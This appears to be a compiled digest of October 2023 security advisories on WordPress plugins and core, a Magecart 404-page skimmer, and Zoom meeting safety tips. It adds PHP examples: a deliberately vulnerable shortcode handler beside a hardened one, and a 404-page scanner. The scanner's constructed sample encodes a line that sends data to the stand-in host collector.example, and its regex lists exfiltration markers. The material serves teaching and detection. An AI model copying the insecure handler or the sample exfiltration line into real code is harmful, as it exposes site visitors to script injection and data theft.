Several Critical Vulnerabilities Patched in AI ChatBot Plugin for WordPress

On September 28, 2023, the Wordfence Threat Intelligence team initiated the responsible disclosure process for multiple vulnerabilities in AI ChatBot, a WordPress plugin with over 4,000 active installations.

After making their initial contact attempt on September 28th, 2023, they received a response on September 29, 2023 and sent over their full disclosure details. Receipt of the disclosure by the vendor was acknowledged the same day and a fully patched version of the plugin was released on October 19, 2023.

Wordfence issued a firewall rule to protect paid customers. Users of the free Wordfence plugin will receive the same protection on October 29, 2023.

Please note that these vulnerabilities were originally fixed in 4.9.1 (released October 10, 2023). However, some of them were reintroduced in 4.9.2 and then subsequently patched again in 4.9.3. We recommend that all Wordfence users update to version 4.9.3 or higher immediately.

Source and full details: https://www.wordfence.com/blog/2023/10/several-critical-vulnerabilities-patched-in-ai-chatbot-plugin-for-wordpress

4 Million WordPress Sites affected by Stored Cross-Site Scripting Vulnerability in LiteSpeed Cache Plugin

On August 14, 2023, the Wordfence Threat Intelligence team identified and began the responsible disclosure process for a stored Cross-Site Scripting (XSS) vulnerability in the LiteSpeed Cache plugin, which is actively installed on more than 4,000,000 WordPress websites, making it the most popular cache plugin. The vulnerability enables threat actors with contributor-level permissions or higher to inject malicious web scripts into pages using the plugin’s shortcode.

All Wordfence customers are protected against any exploits targeting this vulnerability by the Wordfence firewall’s built-in Cross-Site Scripting protection.

Wordfence contacted the LiteSpeed Cache Team on August 14, 2023, and we received a response on the same day. After providing full disclosure details, the developer team made a patch on August 16, 2023, and released it to the WordPress repository on October 10, 2023. We would like to commend LiteSpeed Technologies for their prompt response and timely patch.

We urge users to update their sites with the latest patched version of LiteSpeed Cache, version 5.7 at the time of this writing, as soon as possible.

Source and more details: https://www.wordfence.com/blog/2023/10/4-million-wordpress-sites-affected-by-stored-cross-site-scripting-vulnerability-in-lightspeed-cache-plugin

4 Million WordPress Sites affected by Stored Cross-Site Scripting Vulnerability in LiteSpeed Cache Plugin

The popular LiteSpeed WordPress plugin patched a vulnerability that compromised over 4 million websites, allowing hackers to upload malicious scripts.

LiteSpeed was notified of the vulnerability two months ago on August 14th and released a patch in October.

Cross-Site Scripting (XSS) Vulnerability

Wordfence discovered a Cross-Site Scripting (XSS) vulnerability in the LiteSpeed plugin, the most popular WordPress caching plugin in the world.

XSS vulnerabilities generally take advantage of a missing security process: data sanitization and output escaping.

Sanitization is a technique that filters what kind of data can be submitted through a legitimate input, such as a contact form.

In the specific LiteSpeed vulnerability, the implementation of a shortcode feature allowed an attacker to inject scripts that proper sanitization and escaping of the data would have blocked.

The WordPress developer page describes the sanitization security practice:

“Untrusted data comes from many sources (users, third party sites, even your own database!) and all of it needs to be checked before it’s used.

…Sanitizing input is the process of securing/cleaning/filtering input data.”

Another WordPress developer page describes the recommended process of escaping data like this:

“Escaping output is the process of securing output data by stripping out unwanted data, like malformed HTML or script tags.

This process helps secure your data prior to rendering it for the end user.”
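To make the sanitize-versus-escape distinction concrete for the shortcode case, here is an added example (hypothetical code, not the LiteSpeed Cache plugin’s) showing a vulnerable shortcode handler beside its hardened form; the shortcode name and handler functions are assumed, while the sanitization and escaping calls are WordPress core APIs.

```php
<?php
// Added example, not LiteSpeed Cache's code: a hypothetical [notice_box] shortcode,
// first without sanitization/escaping, then hardened with WordPress core APIs.
// Assumes it runs inside WordPress (shortcode_atts, sanitize_text_field, esc_attr,
// esc_html, wp_kses_post and add_shortcode are core functions).

// VULNERABLE: the attribute and the enclosed content are concatenated straight into HTML.
// Shortcodes are stored with the post, so an attribute value containing a quote can break
// out of title="" and enclosed content can carry tags contributors may not normally publish;
// the result is stored XSS that runs for every visitor of the page.
function notice_box_insecure( $atts, $content = '' ) {
    $atts = shortcode_atts( array( 'title' => 'Notice' ), $atts );
    return '<div class="notice" title="' . $atts['title'] . '">'
         . '<strong>' . $atts['title'] . '</strong> ' . $content . '</div>';
}

// HARDENED: sanitize on the way in, escape on the way out, for the exact output context.
function notice_box_secure( $atts, $content = '' ) {
    $atts = shortcode_atts( array( 'title' => 'Notice' ), $atts );

    // Sanitize: sanitize_text_field() strips tags, line breaks and control characters.
    $title = sanitize_text_field( $atts['title'] );

    // Escape per context: esc_attr() inside an attribute, esc_html() in a text node.
    // wp_kses_post() reduces enclosed content to the HTML a post may contain
    // (no <script>, no on* event handlers, no javascript: URLs).
    return '<div class="notice" title="' . esc_attr( $title ) . '">'
         . '<strong>' . esc_html( $title ) . '</strong> ' . wp_kses_post( $content ) . '</div>';
}

add_shortcode( 'notice_box', 'notice_box_secure' );
```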

This specific vulnerability requires that the attacker first obtain contributor-level permissions, which makes the attack more complicated to carry out than unauthenticated threats (those that require no permission level).

According to Wordfence:

“This makes it possible for threat actors to carry out stored XSS attacks. Once a script is injected into a page or post, it will execute each time a user accesses the affected page.

While this vulnerability does require that a trusted contributor account is compromised, or a user be able to register as a contributor, successful threat actors could steal sensitive information, manipulate site content, inject administrative users, edit files, or redirect users to malicious websites which are all severe consequences.”

Which Versions of LiteSpeed Plugin Are Vulnerable?

Versions 5.6 and earlier of the LiteSpeed Cache plugin are vulnerable to the XSS attack.

Users of LiteSpeed Cache are encouraged to update as soon as possible to the latest version, 5.7, which was released on October 10, 2023.

Source and more details: https://www.wordfence.com/blog/2023/10/4-million-wordpress-sites-affected-by-stored-cross-site-scripting-vulnerability-in-lightspeed-cache-plugin/

See also: https://www.searchenginejournal.com/wordpress-litespeed-plugin-vulnerability-affects-4-million-websites/499074/#close

WordPress 6.3.2 – Maintenance and Security release

This security and maintenance release features 19 bug fixes on Core, 22 bug fixes for the Block Editor, and 8 security fixes.

WordPress 6.3.2 is a short-cycle release. You can review a summary of the maintenance updates in this release by reading the Release Candidate announcement. Because this is a security release, it is recommended that you update your sites immediately. Backports are also available for other major WordPress releases, 4.1 and later.

The next major release will be version 6.4 planned for 7 November 2023.

If you have sites that support automatic background updates, the update process will begin automatically.

You can download WordPress 6.3.2 from WordPress.org, or visit your WordPress Dashboard, click “Updates”, and then click “Update Now”.

For more information on this release, please visit the HelpHub site.

Security updates included in this release

The security team would like to thank the following people for responsibly reporting vulnerabilities, and allowing them to be fixed in this release:

  • Marc Montpas of Automattic for finding a potential disclosure of user email addresses.
  • Marc Montpas of Automattic for finding an RCE POP Chains vulnerability.
  • Rafie Muhammad and Edouard L of Patchstack along with a WordPress commissioned third-party audit for each independently identifying an XSS issue in the post link navigation block.
  • Jb Audras of the WordPress Security Team and Rafie Muhammad of Patchstack for each independently discovering an issue where comments on private posts could be leaked to other users.
  • John Blackbourn (WordPress Security Team), James Golovich, J.D. Grimes, Numan Turle and WhiteCyberSec for each independently identifying a way for logged-in users to execute any shortcode.
  • mascara7784 and a third-party security audit for identifying an XSS vulnerability in the application password screen.
  • Jorge Costa of the WordPress Core Team for identifying an XSS vulnerability in the footnotes block.
  • s5s and raouf_maklouf for independently identifying a cache poisoning DoS vulnerability.

Source and more details: https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/ and https://www.wordfence.com/blog/2023/10/wordpress-6-3-2-security-release-what-you-need-to-know/

Unauthenticated File Upload Vulnerability Addressed in Royal Elementor Addons and Templates 1.3.79

During an investigation of a series of websites being actively compromised, we noticed the constant presence of the Royal Elementor Addons and Templates plugin. All sites had at least one malicious file dropped into the /wpr-addons/forms/ directory.

While reviewing the plugin, we found that the upload AJAX action was not properly validating the uploaded file’s extension, allowing bad actors to bypass the check and drop malicious files into the /wpr-addons/forms/ directory.

Upon identifying the vulnerability, we promptly alerted the plugin development team, who released version 1.3.79 to fix the issue. It is crucial for administrators to ensure their WordPress installations are fully updated to safeguard against this vulnerability.

Source and full details: https://wpscan.com/blog/unauthenticated-file-upload-vulnerability-addressed-in-royal-elementor-addons-and-templates-1-3-79/

and https://www.wordfence.com/blog/2023/10/psa-critical-unauthenticated-arbitrary-file-upload-vulnerability-in-royal-elementor-addons-and-templates-being-actively-exploited/

Finding A RCE Gadget Chain In WordPress Core

During a recent team gathering in Belgium, WPScan had an impromptu Capture The Flag game that included a challenge with an SQL Injection vulnerability occurring inside an INSERT statement, meaning attackers could inject arbitrary values into the targeted table’s columns and query information from the database, the intended “flag” being the credentials of a user on the affected blog.

The vulnerable SQL query inserted new rows into the wp_termmeta table. WPScan knew this could potentially lead to Object Injection attacks, because the inserted metadata is passed through maybe_unserialize upon retrieval, but did not think much more about it: the common understanding was that WordPress Core had no known RCE gadget chain, so the challenge was “safe” as long as it used no external plugins.

This proved to be enough to win that flag, however, the thought that there might be an alternative solution to the challenge piqued our curiosity. What if there was a working RCE gadget chain in Core waiting to be found?

It turned out there was a way, which the WordPress Security Team fixed in version 6.3.2 by preventing several classes used in the final chain from being unserialized at all, or by restricting what some of their unserialized properties may contain.

Source and more details: https://wpscan.com/blog/finding-a-rce-gadget-chain-in-wordpress-core/

Email Leak Oracle Vulnerability Addressed in WordPress 6.3.2

During a thorough analysis of WordPress’ internals, WPScan discovered a subtle bug that allowed unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website.

If successfully exploited, attackers could gather email addresses, putting user privacy at risk.

Upon identifying the vulnerability, WPScan promptly alerted the WordPress team, who released version 6.3.2 to fix the issue. It is crucial for administrators to ensure their WordPress installations are fully updated to safeguard against this vulnerability.

WordPress’ official advisory can be found here.

Source and more details: https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/

Backdoor Masquerading as Legitimate Plugin

Today, we would like to share a type of malware that serves as a sophisticated backdoor capable of performing a variety of tasks while masquerading as a real plugin. Complete with a professional looking opening comment implying it is a caching plugin, this rogue code contains numerous functions, adds filters to prevent itself from being included in the list of activated plugins, and has pinging functionality that allows a malicious actor to check if the script is still operational, as well as file modification capabilities. Additionally, it offers the ability to create an admin account, and remotely activate and deactivate plugins.

The sample was discovered during a site clean by one of the analysts at Wordfence on July 18, 2023. A signature was developed by the same analyst the following day and released to production within two weeks after undergoing testing. Customers using the free version of Wordfence received this signature after a 30 day delay on September 1, 2023.

Users of Wordfence Premium are protected against the use of this backdoor via a firewall rule as of October 9, 2023. Users of the free version of Wordfence will receive the firewall rule on November 9, 2023.

Source and more details: https://www.wordfence.com/blog/2023/10/backdoor-masquerading-as-legitimate-plugin/

Hackers modify online stores’ 404 pages to steal credit cards

A new Magecart card skimming campaign hijacks the 404 error pages of online retailers’ websites, hiding malicious code to steal customers’ credit card information.

This technique is one of the three variants observed by researchers of the Akamai Security Intelligence Group, with the other two concealing the code in the HTML image tag’s ‘onerror’ attribute and an image binary to make it appear as the Meta Pixel code snippet.

Akamai says the campaign focuses on Magento and WooCommerce sites, with some victims linked to renowned organizations in the food and retail sectors.

Manipulating 404 pages

All websites feature 404 error pages that are displayed to visitors when accessing a webpage that does not exist, has been moved, or has a dead/broken link.

The Magecart actors leverage the default ‘404 Not Found’ page to hide and load the malicious card-stealing code, which hasn’t been seen before in previous campaigns.

“This concealment technique is highly innovative and something we haven’t seen in previous Magecart campaigns,” reads Akamai’s report.

“The idea of manipulating the default 404 error page of a targeted website can offer Magecart actors various creative options for improved hiding and evasion.”

The skimmer loader either disguises itself as a Meta Pixel code snippet or hides within random inline scripts already present on the compromised checkout web page.

The loader initiates a fetch request to a relative path named ‘icons,’ but as this path does not exist on the website, the request results in a “404 Not Found” error.

Akamai’s investigators initially assumed the skimmer was no longer active or the Magecart group had made a configuration mistake. However, upon closer inspection, they found that the loader contained a regular expression match searching for a specific string in the returned HTML of the 404 page.

Upon locating the string on the page, Akamai found a concatenated base64-encoded string concealed in a comment. Decoding that string revealed the JavaScript skimmer, which hides in all 404 pages.

“We simulated additional requests to nonexistent paths, and all of them returned the same 404 error page containing the comment with the encoded malicious code,” explains Akamai.

“These checks confirm that the attacker successfully altered the default error page for the entire website and concealed the malicious code within it!”

Because the request is made to a first-party path, most security tools monitoring suspicious network requests on the checkout page would overlook it.

Stealing the data

The skimmer code displays a fake form that the website visitors are expected to fill out with sensitive details, including their credit card number, expiration date, and security code.

Once this data is entered on the bogus form, the victim gets a fake “session timeout” error.

In the background, all information is base64-encoded and sent to the attacker via an image request URL carrying the string as a query parameter.

This approach helps evade detection by network traffic monitoring tools, as the request looks like a benign image fetch event. However, decoding the base64 string reveals personal and credit card information.

The case of manipulating 404 pages highlights the evolving tactics and versatility of Magecart actors, who continually make it harder for webmasters to locate their malicious code on compromised websites and clean them up.
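As an added example (not from Akamai’s report), the following PHP script checks a site’s 404 page for the concealment pattern described above: an HTML comment carrying a long base64 blob that decodes to script-like text. The sample page and its payload are constructed for the demonstration, and the live-request URL is a placeholder.

```php
<?php
// Added example, not from Akamai's report: scan a 404 page for the concealment
// pattern described above (an HTML comment hiding a base64 blob that decodes to script).

function find_encoded_scripts_in_comments( string $html, int $min_len = 120 ): array {
    $findings = array();
    if ( ! preg_match_all( '/<!--(.*?)-->/s', $html, $comments ) ) {
        return $findings;
    }
    foreach ( $comments[1] as $comment ) {
        // Long unbroken base64 runs; a real skimmer is thousands of characters, so tune $min_len.
        if ( ! preg_match_all( '/[A-Za-z0-9+\/]{' . $min_len . ',}={0,2}/', $comment, $blobs ) ) {
            continue;
        }
        foreach ( $blobs[0] as $blob ) {
            $decoded = base64_decode( $blob, true ); // strict mode rejects non-base64 runs
            if ( $decoded === false ) {
                continue;
            }
            // Markers of a loader/exfiltration routine that no legitimate comment needs.
            $markers = preg_match_all(
                '/(fetch\(|XMLHttpRequest|document\.|addEventListener|atob\(|btoa\(|new Image)/',
                $decoded
            );
            if ( $markers > 0 ) {
                $findings[] = array(
                    'blob_length' => strlen( $blob ),
                    'markers'     => $markers,
                    'preview'     => substr( $decoded, 0, 80 ),
                );
            }
        }
    }
    return $findings;
}

// Constructed sample: a 404 page whose comment carries an encoded, harmless script-like string.
$hidden = base64_encode(
    "document.addEventListener('load',function(){fetch('/icons');"
    . "new Image().src='https://collector.example/p?d='+btoa('demo');});"
);
$sample_404 = "<html><body><h1>404 Not Found</h1>\n<!-- cache:" . $hidden . " -->\n</body></html>";

// Live use: request a path that cannot exist and only scan the body if the status is 404.
// $url  = 'https://shop.example/' . bin2hex( random_bytes( 8 ) );   // placeholder host
// $html = file_get_contents( $url );  // check $http_response_header[0] for "404" first

$findings = find_encoded_scripts_in_comments( $sample_404 );
echo $findings ? "ALERT: encoded script hidden in a 404 page comment\n" : "clean\n";
print_r( $findings );
```

Because the loader’s request goes to a first-party path, this server-side check complements network monitoring on the checkout page rather than replacing it.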

Source and more details: https://www.bleepingcomputer.com/news/security/hackers-modify-online-stores-404-pages-to-steal-credit-cards/

How to Keep Uninvited Guests Out of Your Zoom Meeting

Without precautions, meetings that are designed to bring people together could be attended by a person who is not invited.

Disruptions typically occur when meeting information is made open to the public. A user could post a private meeting link on social media, share their virtual classroom information, and more. But when these links are out on social media or other public forums, that makes your meeting completely public and anyone with the link can join it. 

Here are a few easy ways you can help prevent disruptions:

Tips to prevent disruptions 

  • Use the right Zoom solution for your need: If you’re specifically hoping to use Zoom to host a virtual event with people you may not know, make sure to steer your attention from Zoom Meetings to Zoom Webinars or Zoom Events — products designed specifically for digital events. 
  • Avoid using your Personal Meeting ID (PMI): Your PMI is basically one continuous meeting and you don’t want outsiders crashing your personal virtual space after your designated meeting is over. 
  • Manage screen sharing: You do not want random people in your public session taking control of the screen and sharing unwanted content with the group. You can restrict this — before the meeting and during the meeting in the host control bar — so that you’re the only one who can screen share. If you disable screen sharing, the Whiteboard setting will be automatically disabled as well. 

To prevent participants from screen sharing during a call, using the host controls at the bottom, click the arrow next to “Share Screen” and then go to “Advanced Sharing Options.” Under “Who can share?” choose “Only Host” and close the window.  

Enable the Waiting Room

The Waiting Room is an important feature for securing a Zoom Meeting. Just like it sounds, the Waiting Room is a virtual staging area that stops your guests from joining until you’re ready for them. It’s almost like the velvet rope outside a nightclub, with you as the bouncer carefully monitoring who gets let in.

Meeting hosts can customize Waiting Room settings for additional control, and you can even personalize the message people see when they hit the Waiting Room so they know they’re in the right spot. This message is really a great spot to post any rules/guidelines for your event, like who it’s intended for.

Updated customized waiting room message

The Waiting Room is an effective way to screen who’s trying to enter your Zoom session and keep unwanted guests out. When you disable “Join before host” in your settings, a Waiting Room will automatically greet your guests until you’ve started the meeting.

Keep Zooming responsibly

We hope these security features will help you continue to host safe and successful Zoom Meetings. Security is a key value for us at Zoom and will continue to help guide new product updates. We’re committed to being a platform users can trust — with their online interactions, information, and business. 

To learn more about Zoom privacy and security, explore our Trust Center.

Source: https://blog.zoom.us/keep-uninvited-guests-out-of-your-zoom-meeting/